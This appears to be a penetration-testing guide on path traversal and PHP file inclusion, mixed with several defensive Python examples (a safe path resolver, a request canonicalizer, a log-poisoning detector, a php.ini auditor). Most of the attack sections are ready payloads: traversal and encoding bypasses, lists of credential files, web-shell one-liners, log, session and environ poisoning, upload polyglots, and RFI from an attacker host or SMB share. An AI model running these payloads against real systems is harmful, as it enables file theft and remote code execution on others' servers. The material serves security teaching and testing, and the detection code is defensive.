
Path Traversal & File Inclusion

Path traversal (directory traversal) and file inclusion vulnerabilities allow attackers to read arbitrary files or execute code by manipulating file paths in web applications. This guide covers LFI, RFI, and advanced exploitation techniques.

Why Path Traversal Matters

Path traversal can expose sensitive configuration files, credentials, and source code. LFI can escalate to RCE through log poisoning, PHP wrappers, or proc exploitation. RFI directly enables code execution by including remote malicious files.

Danger

File inclusion attacks can lead to sensitive data exposure and remote code execution. Always ensure you have proper authorization before testing.

Tools & Resources

dotdotpwn
  Directory traversal fuzzer. Install: apt install dotdotpwn (GitHub)

LFISuite
  Automated LFI exploitation. Install: git clone LFISuite (GitHub)

ffuf
  Fast web fuzzer for LFI testing. Install: apt install ffuf (GitHub)

Kadimus
  LFI scanner and exploiter. Install: git clone kadimus (GitHub)

Burp Suite
  Manual path traversal testing. Website: portswigger.net

SecLists LFI
  LFI wordlists and payloads. Path: Fuzzing/LFI/ (GitHub)

Understanding Path Traversal

Path traversal occurs when an application uses user input to construct file paths without proper validation. Attackers use sequences like ../ to navigate outside the intended directory.

Vulnerability Types

Path Traversal

Read files outside webroot using ../ sequences

LFI (Local File Inclusion)

Include local files; in PHP the included file is parsed and executed as PHP code

RFI (Remote File Inclusion)

Include and execute files from remote servers

Basic Path Traversal

Common Payloads

traversal-payloads.txt
plaintext
# Basic traversal
../../../etc/passwd
..\..\..\windows\win.ini

# Absolute path (if allowed)
/etc/passwd
C:\windows\win.ini

# URL encoded
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd (double encoding)

# Null byte (PHP < 5.3.4)
../../../etc/passwd%00
../../../etc/passwd%00.jpg

# Deep traversal (extra ..\ or ../ are harmless once the filesystem root is reached)
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd
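As an added example (not code from the original page), here is the pattern that makes these payloads work next to a hardened resolver, in Python. The base directory, the about.html page and the helper names are made up for the demo; the payloads are the ones listed above.

```python
import os
import re
import tempfile


class PathTraversalError(ValueError):
    """Raised when a user-supplied name would resolve outside the base directory."""


def insecure_join(base, user_path):
    """The vulnerable pattern: the request value is glued onto a base path unchecked.
    Note that os.path.join itself offers no protection: an absolute user_path
    replaces base entirely, and '..' components are kept verbatim."""
    return os.path.join(base, user_path)


def safe_join(base, user_path):
    """Resolve user_path strictly inside base, or raise PathTraversalError."""
    if "\x00" in user_path:
        # A C-level open() stops at the first NUL; that is what the %00 payloads rely on.
        raise PathTraversalError("null byte in path")
    # Treat backslashes as separators so Windows-style payloads are judged the same way.
    cleaned = user_path.replace("\\", "/")
    if cleaned.startswith("/") or re.match(r"^[A-Za-z]:", cleaned):
        raise PathTraversalError("absolute path not allowed")
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, cleaned))
    # realpath collapses every '..' and follows symlinks, so the comparison is made on the
    # final filesystem location rather than on the string the client sent. commonpath is
    # used instead of startswith so that /srv/pages-evil is not accepted for base /srv/pages.
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PathTraversalError(f"{user_path!r} escapes {base!r}")
    return candidate


def is_traversal_attempt(base, user_path):
    """True when safe_join rejects the value; handy for a unit-test matrix of payloads."""
    try:
        safe_join(base, user_path)
        return False
    except PathTraversalError:
        return True


def read_page(base, user_path):
    """Return the file content for a request value, using the hardened resolver."""
    with open(safe_join(base, user_path), "r", encoding="utf-8") as fh:
        return fh.read()


def make_demo_dir():
    """Create a throwaway page directory (hypothetical layout) holding one page."""
    base = tempfile.mkdtemp(prefix="pages-")
    with open(os.path.join(base, "about.html"), "w", encoding="utf-8") as fh:
        fh.write("<h1>About</h1>")
    return base


def demo():
    """Compare both resolvers on the payloads from the list above."""
    base = make_demo_dir()
    payloads = [
        "about.html",
        "../../../etc/passwd",
        "..\\..\\..\\windows\\win.ini",
        "/etc/passwd",
        "../../../etc/passwd\x00.jpg",
        "../" * 20 + "etc/passwd",
    ]
    for p in payloads:
        verdict = "REJECTED" if is_traversal_attempt(base, p) else safe_join(base, p)
        print(f"{p!r:45} insecure -> {insecure_join(base, p)}")
        print(f"{'':45} safe     -> {verdict}")
    print(read_page(base, "about.html"))


if __name__ == "__main__":
    demo()
```

The web framework decodes percent-encoding once before the handler runs, so a double-encoded `%252f` reaches safe_join as the literal text `%2f`, which it treats as ordinary filename characters; the remaining encoding tricks are therefore a concern for the decoding layer, not for this containment check.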

Interesting Files to Read

Linux Files

linux-files.txt
plaintext
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/group
/etc/crontab
/etc/ssh/sshd_config
/proc/self/environ
/proc/self/cmdline
/proc/version
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/auth.log
/var/log/syslog
/home/user/.bash_history
/home/user/.ssh/id_rsa
/root/.bash_history

Windows Files

windows-files.txt
plaintext
C:\windows\win.ini
C:\windows\system32\config\sam
C:\windows\system32\config\system
C:\windows\system32\config\security
C:\windows\repair\sam
C:\windows\repair\system
C:\windows\php.ini
C:\xampp\apache\conf\httpd.conf
C:\xampp\php\php.ini
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\
C:\Users\Administrator\.ssh\id_rsa
C:\Program Files\MySQL\my.ini

Application-Specific Files

app-files.txt
plaintext
# Web application configs
.htaccess
.htpasswd
wp-config.php
config.php
configuration.php
database.yml
settings.py
.env
.git/config
composer.json
package.json

# Framework specific
# Laravel
../storage/logs/laravel.log
../.env

# WordPress
../wp-config.php

# Drupal
../sites/default/settings.php

# Tomcat
../conf/tomcat-users.xml
../conf/server.xml

Filter Bypass Techniques

Encoding Bypasses

encoding-bypass.txt
plaintext
# URL encoding
%2e%2e%2f = ../
%2e%2e/ = ../
..%2f = ../
%2e%2e%5c = ..\

# Double URL encoding
%252e%252e%252f = ../
..%252f = ../

# 16-bit Unicode encoding
%u002e%u002e%u002f = ../
..%u002f = ../

# Overlong UTF-8 encoding
%c0%ae%c0%ae%c0%af = ../
%e0%80%ae%e0%80%ae%e0%80%af = ../

# Mixed encoding
..%c0%af = ../
..%ef%bc%8f = ../

Path Normalization Bypasses

normalization-bypass.txt
plaintext
# Doubled slashes
....//....//....//etc/passwd
....//../....//../....//../etc/passwd

# Backslash variations (Windows)
..\..\..\..\etc/passwd
....\\....\\....\\etc/passwd

# Mixed separators
../..\..//..\etc/passwd

# Current directory bypass
./../.../....//etc/passwd
./../.././../.././../../etc/passwd

# Adding extra characters
..;/..;/..;/etc/passwd
..%00/..%00/..%00/etc/passwd

Extension Bypass

extension-bypass.txt
plaintext
# Null byte (PHP < 5.3.4)
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
../../../etc/passwd\0.txt

# Path truncation (Windows, long paths)
../../../etc/passwd............[ADD MORE DOTS TO 256+ CHARS]

# Double extension
../../../etc/passwd.jpg
../../../etc/passwd%00.expected.ext

# Query string termination
../../../etc/passwd?.jpg
../../../etc/passwd#.jpg
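As an added example (not from the original page), a Python canonicalizer that undoes the encoding, normalization and extension tricks listed in the three sections above and reports which of them a request value relied on. It is written for log review or a WAF-style pre-check: decode repeatedly, fold Unicode look-alikes, then walk the path to see whether it leaves the base directory. The request lines are constructed for the demo and the function names are my own.

```python
import re
import unicodedata
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed request lines for the demo (not from a real server); the values mirror the
# bypass lists above.
SAMPLE_REQUESTS = [
    "/index.php?page=about",
    "/index.php?page=../../../etc/passwd",
    "/index.php?page=..%252f..%252f..%252fetc%252fpasswd",
    "/index.php?page=%c0%ae%c0%ae%c0%afetc/passwd",
    "/index.php?page=....//....//....//etc/passwd",
    "/index.php?page=..;/..;/..;/etc/passwd",
    "/index.php?page=..%ef%bc%8f..%ef%bc%8fetc/passwd",
    "/index.php?page=../../../etc/passwd%00.jpg",
    "/download?file=reports/2024/q1.pdf",
]


def decode_layers(value, max_rounds=3):
    """Peel URL-encoding layers off value. Returns (decoded string, findings)."""
    findings = []
    current = value
    for round_no in range(max_rounds):
        # IIS-style %uXXXX escapes are not understood by unquote; map them to characters first.
        step = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), current)
        if step != current:
            findings.append("%u unicode escape")
        raw = unquote_to_bytes(step)
        try:
            decoded = raw.decode("utf-8")
        except UnicodeDecodeError:
            # Overlong forms such as %c0%ae are rejected by a strict decoder; keep the bytes
            # as Latin-1 so the path walk below can still run on something.
            findings.append("invalid or overlong UTF-8 in percent-encoding")
            decoded = raw.decode("latin-1")
        if decoded == current:
            break
        if round_no >= 1:
            findings.append("multiple encoding layers")
        current = decoded
    return current, findings


def analyze_path(value):
    """Canonicalize one user-supplied path value and list the traversal indicators found."""
    decoded, findings = decode_layers(value)
    # Fullwidth solidus (U+FF0F) and similar compatibility characters fold to ASCII under NFKC.
    folded = unicodedata.normalize("NFKC", decoded)
    if folded != decoded:
        findings.append("unicode compatibility characters folded to ASCII")
    if "\x00" in folded:
        findings.append("null byte")
        folded = folded.split("\x00", 1)[0]  # what a C-string consumer would have seen
    folded = folded.replace("\\", "/")
    if folded.startswith("/") or re.match(r"^[A-Za-z]:/", folded):
        findings.append("absolute path")
    depth, escaped = 0, False
    for segment in folded.split("/"):
        if ";" in segment:
            # Servlet-container style path parameters: "..;x" is still ".." to the resolver.
            findings.append("path parameter (;) inside a segment")
            segment = segment.split(";", 1)[0]
        if segment == "..":
            depth -= 1
            escaped = escaped or depth < 0
        elif len(segment) > 2 and set(segment) == {"."}:
            # "....//" survives a filter that strips "../" once, then becomes "../".
            findings.append("dot-padded segment (....// style)")
        elif segment and segment != ".":
            depth += 1
    if escaped:
        findings.append("resolves above the base directory")
    return folded, sorted(set(findings))


def scan_requests(requests):
    """Check every raw query parameter of each request; return (request, param, findings) hits."""
    flagged = []
    for req in requests:
        for pair in urlsplit(req).query.split("&"):
            name, _, raw_value = pair.partition("=")
            if not name:
                continue
            _, findings = analyze_path(raw_value)
            if findings:
                flagged.append((req, name, findings))
    return flagged


if __name__ == "__main__":
    for req, name, findings in scan_requests(SAMPLE_REQUESTS):
        print(f"{req}\n    {name}: {', '.join(findings)}")
```

The decode loop is bounded on purpose: a value that still changes after three rounds is itself suspicious, and an unbounded loop would hand an attacker a cheap way to burn CPU in the detector.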

Local File Inclusion (LFI)

LFI goes beyond simple file reading: in PHP applications, included files are executed as PHP code, enabling various RCE techniques.

PHP Wrappers

php-wrappers.txt
plaintext
# Base64 encode file (read source code)
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php

# Read with different filters
php://filter/read=string.rot13/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php

# Data wrapper (RCE if allow_url_include=On)
data://text/plain,<?php system($_GET['cmd']); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

# Expect wrapper (RCE if expect:// installed)
expect://id
expect://ls

# Input wrapper (POST data as file content)
php://input
# POST: <?php system($_GET['cmd']); ?>

# Phar wrapper
phar://uploads/avatar.jpg/shell.php

Log Poisoning

log-poisoning.sh
bash
# Step 1: Poison Apache access log via User-Agent
curl "http://target.com/" -A "<?php system($_GET['cmd']); ?>"

# Step 2: Include the log file
?page=../../../var/log/apache2/access.log&cmd=id

# Alternative log locations
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/httpd/access_log
/var/log/nginx/access.log
/var/log/auth.log (SSH log - use username as payload)
/var/log/mail.log
/proc/self/environ (inject via User-Agent header)
/proc/self/fd/0-99 (file descriptors)

/proc/self/environ Poisoning

proc-environ.sh
bash
# Step 1: Inject payload in User-Agent
curl "http://target.com/index.php?page=../../../proc/self/environ" \
  -A "<?php system($_GET['cmd']); ?>"

# Step 2: Access with command
curl "http://target.com/index.php?page=../../../proc/self/environ&cmd=id"

# The User-Agent appears in HTTP_USER_AGENT environment variable
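As an added example (not from the original page), a Python detector for the two halves of the log-poisoning and /proc/self/environ techniques described in the preceding sections: a PHP tag arriving in a header that the server writes to its log or environment (User-Agent, Referer), followed by a request whose file parameter points at a log, /proc/self or session file. It parses Apache combined-format lines and correlates both signals per source address. The log lines are constructed for the demo and the helper names are my own.

```python
import re

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# (Apache writes embedded double quotes as \" ; the sample below contains none.)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?php", re.IGNORECASE)
# Targets whose inclusion turns a poisoned header into executed code.
SENSITIVE_TARGET_RE = re.compile(r"/var/log/|/proc/self/|sess_", re.IGNORECASE)

# Constructed sample log (not from a real server). The poisoned User-Agent is the page's
# own example payload; 10.0.0.9 first plants it, then includes the log and /proc/self/environ.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=../../../proc/self/environ HTTP/1.1" 200 300 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=contact HTTP/1.1" 200 800 "https://example.test/" "Mozilla/5.0"
'''


def parse_line(line):
    """Return the combined-format fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze_log(text):
    """Return (ip, timestamp, reasons) for every line that shows a poisoning or inclusion signal."""
    alerts = []
    for line in text.strip().splitlines():
        fields = parse_line(line)
        if fields is None:
            continue
        reasons = []
        for name in ("ua", "referer"):
            if PHP_TAG_RE.search(fields[name]):
                reasons.append(f"php tag in {name}")
        if SENSITIVE_TARGET_RE.search(fields["req"]):
            reasons.append("request targets log, /proc/self or session file")
        if reasons:
            alerts.append((fields["ip"], fields["ts"], reasons))
    return alerts


def correlate(alerts):
    """Group alerts by source IP and keep only sources that show BOTH signals: the write
    (php tag in a logged header) and the read (inclusion of a log/proc/session file).
    Either signal alone is noise-prone; the pair is the strongest indicator."""
    by_ip = {}
    for ip, _, reasons in alerts:
        by_ip.setdefault(ip, set()).update(reasons)
    return {
        ip: sorted(reasons)
        for ip, reasons in by_ip.items()
        if any("php tag" in r for r in reasons) and any("targets" in r for r in reasons)
    }


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for ip, ts, reasons in found:
        print(f"{ts} {ip}: {', '.join(reasons)}")
    print("correlated sources:", correlate(found))
```

Because the poisoning request itself is usually harmless-looking (a GET for / with an odd User-Agent), alerting on the correlated pair per source keeps false positives down while still catching the single-request case where the tag and the /proc/self/environ include arrive together.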

Session File Inclusion

session-inclusion.sh
bash
# Step 1: Create session with PHP code
# Access: index.php?name=<?php system($_GET['cmd']); ?>
# This stores payload in session

# Step 2: Find session file location
/var/lib/php/sessions/sess_[SESSIONID]
/var/lib/php5/sessions/sess_[SESSIONID]
/tmp/sess_[SESSIONID]
C:\Windows\Temp\sess_[SESSIONID]

# Step 3: Include session file
?page=../../../var/lib/php/sessions/sess_abc123&cmd=id

# Get session ID from cookie
# Cookie: PHPSESSID=abc123

Upload + LFI Combo

upload-lfi.sh
bash
# Step 1: Upload image with PHP code in EXIF
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg

# Or create polyglot
# Create GIF89a header with PHP code appended
echo -e 'GIF89a<?php system($_GET["cmd"]); ?>' > shell.gif

# Step 2: Upload as avatar/image

# Step 3: Include via LFI
?page=../../../uploads/avatars/shell.gif&cmd=id
?page=../../../uploads/image.jpg&cmd=id

Remote File Inclusion (RFI)

Warning

RFI requires allow_url_include = On in PHP, which is disabled by default in modern PHP versions. It's still common in legacy applications.

Basic RFI Exploitation

rfi-basic.sh
bash
# Host malicious PHP file on attacker server
# shell.txt (use .txt to avoid local execution)
<?php system($_GET['cmd']); ?>

# Include remote file
?page=http://attacker.com/shell.txt
?page=http://attacker.com/shell.txt?
?page=http://attacker.com/shell.txt%00

# Bypass extension filtering
?page=http://attacker.com/shell.txt?.php
?page=http://attacker.com/shell.txt%00.php

# Using data URI
?page=data://text/plain,<?php system($_GET['cmd']); ?>

RFI via SMB (Windows)

rfi-smb.sh
bash
# Set up SMB share on attacker machine
# Using Impacket smbserver
python smbserver.py share /path/to/share

# shell.php on SMB share
<?php system($_GET['cmd']); ?>

# Include via UNC path
?page=\\attacker-ip\share\shell.php
?page=//attacker-ip/share/shell.php

LFI to RCE Techniques

LFI2RCE Methods Summary

Method                    | Requirements
--------------------------|------------------------------------------
Log Poisoning             | Read access to log files
PHP Wrappers (data://)    | allow_url_include=On
PHP Wrappers (expect://)  | expect extension installed
php://input               | allow_url_include=On
Session Inclusion         | Session storage accessible
/proc/self/environ        | Linux, readable proc filesystem
Upload + Include          | File upload functionality
phpinfo() + Race          | phpinfo() page accessible
Phar Deserialization      | Upload + vulnerable unserialize
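Most rows in the table above reduce to a handful of php.ini directives. As an added example (not from the original page), a small Python audit script that reads a php.ini and reports the settings that enable the wrapper-based methods, with a weak configuration beside a hardened one. Both ini excerpts are constructed for the demo; the function names are my own.

```python
import re

# Constructed php.ini excerpt with the legacy settings the table's wrapper rows depend on.
SAMPLE_PHP_INI_WEAK = """
[PHP]
; left over from an old deployment
allow_url_fopen = On
allow_url_include = On
display_errors = On
extension=expect
"""

# Constructed hardened counterpart.
SAMPLE_PHP_INI_HARDENED = """
[PHP]
allow_url_fopen = Off
allow_url_include = Off
display_errors = Off
open_basedir = "/var/www/app:/tmp"
"""

# PHP's built-in values when a directive is absent from the file.
BUILTIN_DEFAULTS = {"allow_url_fopen": "1", "allow_url_include": "0", "display_errors": "1"}


def parse_php_ini(text):
    """Minimal php.ini reader: returns ({directive: value}, [loaded extension names])."""
    settings, extensions = {}, []
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()        # ';' starts a comment
        if not line or line.startswith("["):        # skip blanks and [Section] headers
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue
        key, value = key.strip().lower(), value.strip().strip('"')
        if key in ("extension", "zend_extension"):
            # extension=expect, extension=expect.so and extension=php_expect.dll load the same module
            extensions.append(re.sub(r"^php_|\.(so|dll)$", "", value.lower()))
        else:
            settings[key] = value
    return settings, extensions


def is_on(value):
    """php.ini boolean semantics: 1/On/True/Yes are true, everything else is false."""
    return value.strip().lower() in ("1", "on", "true", "yes")


def audit_php_ini(text):
    """Return (directive, explanation) pairs for settings that enable the LFI-to-RCE methods."""
    settings, extensions = parse_php_ini(text)
    get = lambda k: settings.get(k, BUILTIN_DEFAULTS.get(k, ""))
    findings = []
    if is_on(get("allow_url_include")):
        findings.append(("allow_url_include",
                         "On: include() accepts http://, data:// and php://input sources (RFI); set Off"))
    if is_on(get("allow_url_fopen")):
        findings.append(("allow_url_fopen",
                         "On: file functions accept remote URLs; set Off unless the app needs it"))
    if "expect" in extensions:
        findings.append(("extension=expect",
                         "expect:// wrapper runs shell commands through include(); unload it"))
    if not get("open_basedir"):
        findings.append(("open_basedir",
                         "unset: file operations may reach any path the PHP user can read; pin to the app tree"))
    if is_on(get("display_errors")):
        findings.append(("display_errors",
                         "On: include() failures reveal absolute paths that guide traversal; set Off in production"))
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", SAMPLE_PHP_INI_WEAK), ("hardened", SAMPLE_PHP_INI_HARDENED)):
        print(f"== {label} ==")
        for directive, why in audit_php_ini(ini) or [("(none)", "no findings")]:
            print(f"  {directive}: {why}")
```

open_basedir and allow_url_include do not remove the underlying include() bug, so the table's log-poisoning, session and upload rows stay available until the application validates the path itself; the audit tells you which of the cheaper wrapper routes are closed.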

PHP Filter Chain RCE

filter-chain.sh
bash
# PHP filter chain for arbitrary file content (no file upload needed!)
# This technique abuses iconv filters to generate arbitrary content
# Tool: https://github.com/synacktiv/php_filter_chain_generator

python php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]);?>'

# Output is a very long filter chain that generates the PHP code
# Example usage:
?page=php://filter/convert.iconv...[LONG CHAIN].../resource=/etc/passwd&cmd=id

Automated Testing

Using ffuf

ffuf-lfi.sh
bash
# Fuzz for LFI with common payloads
ffuf -u "http://target.com/index.php?page=FUZZ" \
  -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
  -fs 0

# Test multiple parameters
ffuf -u "http://target.com/index.php?FUZZ=../../../etc/passwd" \
  -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
  -fs 0

# With encoding
ffuf -u "http://target.com/index.php?page=FUZZ" \
  -w lfi-payloads.txt \
  -e .php,.txt,.html \
  -fs 0

Using dotdotpwn

dotdotpwn-usage.sh
bash
# HTTP module
dotdotpwn -m http -h target.com -x 80 -f /etc/passwd -k "root:" -d 8

# HTTP with specific URL
dotdotpwn -m http-url -u "http://target.com/view.php?file=TRAVERSAL" \
  -k "root:" -d 8

# Options:
# -d: depth of traversal
# -k: keyword to detect success
# -f: file to read
# -o: output file

Testing Checklist

🔍 Detection

  • Test file parameters (?page=, ?file=, ?path=)
  • Test with ../../../etc/passwd
  • Check for path/file in POST parameters
  • Test cookie values with file paths
  • Check referer/user-agent handling

🔓 Bypass Testing

  • Try URL encoding variants
  • Test double encoding
  • Try null byte injection
  • Test path truncation
  • Mix forward/back slashes

📁 File Discovery

  • Read /etc/passwd, win.ini
  • Find application config files
  • Check for .env, config.php
  • Read web server configs
  • Extract SSH keys if possible

💥 RCE Escalation

  • Try PHP wrappers for RCE
  • Attempt log poisoning
  • Check session file inclusion
  • Test upload + LFI combo
  • Try /proc/self/environ

Practice Labs